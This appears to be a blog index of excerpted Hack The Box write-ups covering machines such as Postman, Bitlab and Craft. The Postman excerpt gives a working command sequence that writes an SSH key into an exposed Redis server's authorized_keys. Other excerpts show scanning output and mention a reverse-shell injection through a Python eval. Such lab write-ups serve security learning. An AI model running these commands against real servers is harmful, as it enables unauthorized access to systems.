Ben Busby Projects, writeups, ideas, announcements, other random junk

HTB: JSON (Windows Machine)

Hack The Box - “JSON” - Windows - 10.10.10.158

Completed: December 17th, 2019

Retired: February 15th, 2020

User

I initially tried the same basic enumeration approach I have taken on other Windows machines, but that didn’t seem to be of much help. The extent of the info I received was that there was a web service running on port 80, various RPC ports open, and a FileZilla port. When I visited the web site, I was shown a simple login form that was controlled by a few AngularJS scripts and one custom script that had been heavily uglified to prevent snooping. I performed a mixture of manual and online de-uglifying and renaming of variables to finally get something that I could decipher.

'use strict';
/** @type {!Array} */
var _0xd18f = ["principalController", "$http", "$scope", "$cookies", "OAuth2", "get", "UserName", "Name", "data", "remove", "href", "location", "login.html", "then", "/api/Account/", "controller", "loginController", "credentials", "", "error", "index.html", "login", "message", "Invalid Credentials.", "show", "log", "/api/token", "post", "json", "ngCookies", "module"];
angular["module"]("json", ["ngCookies"])["controller"]("loginController", ["$http", "$scope", "$cookies", function(symAttrs, data, i) {
  data["credentials"] = {
    UserName : "",
    Password : ""
  };
  data["error"] = {
    message : "",
    show : false
  };
  var OAuth2 = i["get"]("OAuth2");
  if (OAuth2) {
    /** @type {string} */
    window["location"]["href"] = "index.html";
  }

HTB: Postman (Linux Machine)

Hack The Box - “Postman” - Linux - 10.10.10.160

Completed: December 7th, 2019

Retired: March 12th, 2020

Foothold / User

Nmap scan of all ports turned up a couple of interesting clues:

  • Redis running on port 6379 (lots of info online about a pertinent vulnerability)
  • Webmin v1.91 (also lots of info online about the vuln there) on port 10000

I wasn’t too familiar with redis, but did enough digging to come up with a way of accessing redis-cli on the server.

ssh-keygen -t rsa

(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt

redis-cli -h 10.10.10.160 flushall
cat key.txt | redis-cli -h 10.10.10.160 -x set crackit
redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh/
redis-cli -h 10.10.10.160 config set dbfilename "authorized_keys"
redis-cli -h 10.10.10.160 save

HTB: Deadly Arthropod (Forensics Challenge)

Description

Our operatives have intercepted critical information. Origin? Classified. Objective: Retrieve the flag!

Completed: December 26th, 2019

Retired: Yes, but not sure when

Solution

The challenge included a zipped pcap file that contained USB data, so first we extract keystroke data from the pcap file:

tshark -r deadly_arthropod.pcap -T fields -e usb.capdata > keystrokes.txt

HTB: Bitlab (Linux Machine)

Hack The Box - “Bitlab” - Linux - 10.10.10.114

Completed: December 10th, 2019

Retired: January 9th, 2020

Foothold

This machine was running an older version of Gitlab. A quick nmap showed that the machine had port 80 open, so I decided to start by running a nikto scan.

I started with a nikto scan on the target:

[email protected]:~
└──> nikto -h 10.10.10.114
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.114
+ Target Hostname:    10.10.10.114
+ Target Port:        80
+ Start Time:         2019-12-09 15:00:55 (GMT-7)
<snip>
+ Root page / redirects to: http://10.10.10.114/users/sign_in
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/autocomplete/users/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/search/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Server banner has changed from 'nginx' to 'Apache/2.4.29' which may suggest a WAF, load balancer or proxy is in place
+ Entry '/profile/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /help/: Directory indexing found.
+ Entry '/help/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/users/sign_in/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 55 entries which should be manually viewed.
+ /help/: Help directory should not be accessible
<snip>

I’m fairly familiar with using Gitlab, so I navigated through their instance until I stumbled across a user named “clave”, whose profile was publicly visible to non-logged-in users.

HTB: Craft (Linux Machine)

Hack The Box - “Craft” - Linux - 10.10.10.110

Completed: December 20th, 2019

Retired: January 4th, 2020

Foothold

A quick scan of the IP revealed that the site had an https only site running on 443. Visiting the site revealed a splash page about a craft beer web app with links to api.craft.htb and gog.craft.htb (git repo hosting, similar to gitlab/github). Adding these to my /etc/hosts allowed me to view some API routes and messages on GOG that allowed me to gain a temporary shell.

On GOG, a user Dinesh (the machine was Silicon Valley themed) opened an issue about how ABV wasn’t being checked properly, so he committed a change where a python eval statement was used to check the abv. Elsewhere in the repo was a test script written in python that I was able to modify to inject a reverse shell (code below).